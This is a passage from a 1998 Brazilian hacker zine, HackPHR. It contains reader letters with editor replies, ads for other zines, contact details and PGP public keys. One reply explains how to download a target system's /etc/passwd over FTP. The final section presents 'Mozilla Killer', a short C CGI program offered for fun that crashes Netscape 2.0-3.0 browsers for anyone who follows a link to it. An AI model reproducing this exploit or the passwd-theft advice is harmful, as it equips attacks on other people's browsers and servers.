eles tb sao americanos, mas nao tao quanto nos. 
Eles sao tao arrogantes que se intitularam como donos da America ate no nome. 


E cara, aproveitando a deixa, vc poderia me ajudar em uma coisa: 
Eu chequei num arquivo passwd de 55k, mas nao consigo copia-lo. Eu do o 
comando mas so chega o arquivo com 0k. como eu contorno isso? 


REPOSTA: Humm, tens razao, os Americ... opz, os Estadunienses sao uns bundoes.
         Mas vc deve notar q quando falo Americanos, nao me refiro aos Sul-
         Americanos, e sim aos Norte-Americanos.
         Quanto ao seu problema de Download do passwd, eh o seguinte:
         Provavelmente vc usa o prog FTP do Linux ou do Win95. Acontece que
         quando vc dah o comando "get passwd" ele nao vai verificar se o ar-
         quivo existe ou nao e falar pra vc, ele soh vai tentar copiar dire-
         to, portanto se ele nao existir ele vem com 0k. O q deve ter de erra-
         do eh q vc nao estah digitando certo, ou estah digitando em MAIUSCU-
         LAS, um erro q nunca deve ser cometido no UNIX, ou simplesmente vc
         nao estah indo no diretorio correto, que seria /etc. Para conferir
         o dir. atual de um "pwd"...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



carai, manow... ia teu zine ta phods, arretado msmo... mas como p/ toda 
regra existe uma excecao, tenho de comentar algumas coisas: mermao, p/ que 
usa tantos sinais? sempre que faco o download e abro aparece com um monte 
de caracteres especiais que sinceramente dificultam um pouco a leitura de 
materias mais tecnicas... a rea phreack tambem precisa ser rearranjada, 
colocar mais material, coisas mais materias tecnicas a respeito da 
telefonia brasileira e nao o carai da americana... a rea anarchy, sem 
comentarios, nao curto esse negocio de mini-terrorismo, mas nada contra... 
a virii zone ta muito boa, o editor realmente merece os creditos... so uma 
coisa: nos proximos numeros, jah que a revista eh direcionada  turma 
iniciante, coloca algumas materias a respeito de interesse geral da galera, 
tipo descricao das operacoes basicas de funcionamento de alguns programas, 
como o pgp, por exemplo... ok manow? po vei, valew pela atencao e espero 
que corra tudo bem por ai, manow... 

OUTof|ORDER

   
RESPOSTA: Como eu ja disse, isso eh pro EDIT do MS-DOZ, nao pro MicroBost
          Word 8.0000 R$: soh 999,99. Sobre a telefonia Brasileira, tem uma
          box nessa ediao e na outra vai ter as voltagens dos telefones a
          cartao. Sobre o PGP, o Cebola vai fazer um tutorial pra proxima
          ediao...


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-




Ola... estou mandando este E-MAIL para lhes pedir um favor... 
Eu no poderei assesar Internet por um tempo apenas E-MAIL e gostaria de 
saber se vcs. poderiam mandar os arquivos sobre PRHECK e as bovas edicoes 
que viram a ser feitas do Hack and Phreak... 
Obridado pela atenc~zao 
maito:????@???????.???.?? 

   *As edicoes 0 e 1 eu ja tenho e dou-lhes os parabens por elas


RESPOSTA: Serio? Eu tmb nao vou poder, vc poderia autalizar minha HP, escre-
          ver materias pro zine, responder os mail, e se vc cozinha bem, po-
          deria fazer meu almoo? Acha q sou quem cara? Suporte tecnico da
          MicroSoft?


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


E aC ! Eu sou Rafael, um beginner, gostaria de saber como faGo para 
   acessar o banco de dados do computador central de um pequeno provedor 
   (para ter acesso as contas, poder alterA-las, abrir novas contas, 
   etc...) 
   Ficaria muito grato se vc me respondesse, o meu e-mail I: 


RESPOSTAS: Hamm, proxima pergunta...
                                                                                 
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


   Eu achei demais a zine de vocs! Eu que sou um iniciante na area hacker e 
   aumentei muito o meu conhecimento no assunto depois de ter lido as 3 zines 
   j feitas, uma aprendizagem facil e, finalmente, alguem que respeita os 
   iniciantes e faz uma oposiao aos lamers... 
   Vocs deveriam colocar mais assuntos hackers e continuar sem aquela trolha 
   de comandos a baboseiras que as TRADICIONAIS costumam fazer. 
   Gostaria de saber como se faz aquele cavalo de troia da zine dois... 
   Eu gostaria de fazer algo pela zine mas eu sou um perdido na area hacker( 
   como eu ja disse ainda estou caminhando...), mas tem o tema anarquia que eu 
   nao entendo o que tem de anarquico nisso...Sei sobre a anarquia e outras 
   cossitas mas.... 
   Valeu e continuem assim! 


   PS: eu nao tenho qbasic, onde eu consigo e como se abre arquivos nele...Bem 
   coisa de begginer... 

   MORRAM LAMERS! 


RESPOSTA: QUALQUER pergunta direcionada a programaao perguntem ao Cebola,
          mandem mails pra ele. cebola_br@hotmail.com


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


   Fala Mandrack! 

   Gostei muito do zine, estou aprendendo muito com 
   ele. 
   Tambem gostaria de dizer que posso ajudar com a 
   pagina do zine, qqr coisa  s falar, ok? =^) 


   Tenho uma nova home page em 
   http://www.theoffice.net/flaviosr mas ainda esta em 
   construcao... 

    
RESPOSTA: Muito legal mesmo saber q vcz aprendem e dao valor ao zine, ao con-
          trario de muitos q vivem do deboche. Se quiser ajudar com o HP, nos
          estamos precisando, entre em contato com a gente...


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


   Ae galera do Hacker n' Pheaker..blz??
   Recebi esses Zines e adorei!
   So de mais!!
   Eu ja li muito Zine...mas muito mesmo!!
   E o Zine que achei mais legal ta sendo este!
   Principalmente a parte Virii...que esta sendo escrita pelo
   Cebola...
   Ele explica muito bem!1
   Valeu mesmo galera
   E vamo ver se num deixa esse Zine morrer como deixaram o Quebra de Sigilo
   morrer!!
   []s A todos e 
   Fuuuiiiii

        Vulcano

RESPOSTA:   :)



   1998, HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                   11  -  ANUNCIOS, PUBLICAOES E MISC.
                  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


   Este eh um espao q a hackPHR abriu no zine para anuncios de outros zines   
e anuncios diversos, como IRContros, BBSz, Home Pages, etc...
   E o melhor de tudo, eh gratis! Apenas mande um e-mail contendo o q vc quer
publicar, o nome, etc...




                               U H F   Z I N E

                             [unit hacker force]

             Visite a HP do UHF Zine, info, e um zine totalmente                    
             destinado aos newbies... Vale a pena conferir:

                             http://uhf.base.org




                      C Y C L O N E   H O M E   P A G E

      http://www.terravista.ciclone.com.br/areiasbrancas/1365/index.html


   

   1998, HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                     12  -  ENTRANDO EM CONTATO
                    -=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

   Se vc quiser comentar sobre uma materia ou alguma coisa assim, mande um
mail para o autor. Se vc nao sabe, no indice e no rodape de cada materia tem
o nome do autor q escreveu, para comentarios gerais sobre o zine, mande para
hacphr@hotmail.com. Use este apenas para comentarios, criticas, sugestoes, e
etc...

Para falar pessoalmente com a gente, ou para se candidatar a editor:


            MaNdRaCk: mandrack@geocities.com

            Cebola  : cebola_br@hotmail.com


   Se quiser usar o PGP:



   MaNdRaCk's PUBLIC KEY:

Type Bits/KeyID    Date       User ID
pub  1024/A236997D 1997/10/24 MaNdRaCk 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzRRBvsAAAEEANLxPF+C/i4WsgKCIctJJEIHRKbYlS3+Wl9Zr2+XWEnN4IeF
2bInC3BR+gMGKqVdzo3cWjvyyi/QnrzhR1HmTlkleNlPPbe/TMW1lYasBW66A9G/
vQoUgVCuCbLQUxdRmcNWnXEB6gRewVftCjfNfvXoI11XPopdqPcda8aiNpl9AAUR
tBtNYU5kUmFDayA8bWFuZHJhY2tAdXNhLm5ldD6JAJUDBRA0UQb79x1rxqI2mX0B
AfSwA/4/FAHPxuCSAdTY9Kdul6EKbaYf2tHDNd0NIpNqrjTiJ3oiVaPiQUR6eMlv
ei1CkNFbAe2tRgWIoucUyOjX6ZTijaB9Fd1mBbAuZStuArL9kSGXzkHoEJZYwyRU
dv6DY8s+0C3om3BoF05lVn/mcgnmdsMFs8d+EeXY/R0EzL4RZg==
=tkyG
-----END PGP PUBLIC KEY BLOCK-----


   Cebola's PUBLIC KEY:


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAzSgZvwAAAEEAM7Fl1R3Kd8sXY0eWm5H+0XKOBO3g6ifpFaz6G+EVW7jjeMO
hs9qW5Kco0bxHOAb8qfILAq3604MtnjiU/yCpk95ZbKjB7GonNeMQVwlhvdAIzyc
A+FvKBzLegWVUz2g3mEs3K1bq16HQFrg4h/w7wTbh8JYmDAh4g5foeaTuHMRAAUR
tC9GcmVkZXJpY28gV2FnbmVyIE8uIE1lbG8gPGxvcmVuemFAYmhuZXQuY29tLmJy
Pg==
=OV6h
-----END PGP PUBLIC KEY BLOCK-----



   1998, HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


               13  -  BRINDE: X-PLOIT P/ NETSCAPE E IE
              -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 



Aqui estah um exploit q existe no Netscape, a versao 4.0 do Netscape corrige
este bug, mas jah dah pra vc se divertir, hehehe

--cut here--

/*

 Mozilla Killer

 Detona todos os navegadores Netscape for Windows  v2.0-3.0.  Ele pode funcio-
 nar nas novas versoes 3.0 p/ Macintosh. Eh soh compilar a fonte e colocar um
 link pro cgi...

 */

#include 

void
main (void)
{
  printf ("Content-type: application/x-netscape-autoconfigure-dialer\n\n");
  printf ("%c%c %c%c ", 237, 237, 237, 237);
}

--cut here--


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   1998, Fevereiro. Hack and Phreak Zine, QUALQUER copia de QUALQUER materia
   deste documento, deve constar as seguintes linhas:

   (nomedoautor)
   HackPHR Zine n. xx
   http://www.hackphr.home.ml.org

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=|FiM dO dOCuMeNtO|=-=-=-=-=-=-=-=-=-=-=-=-=-=-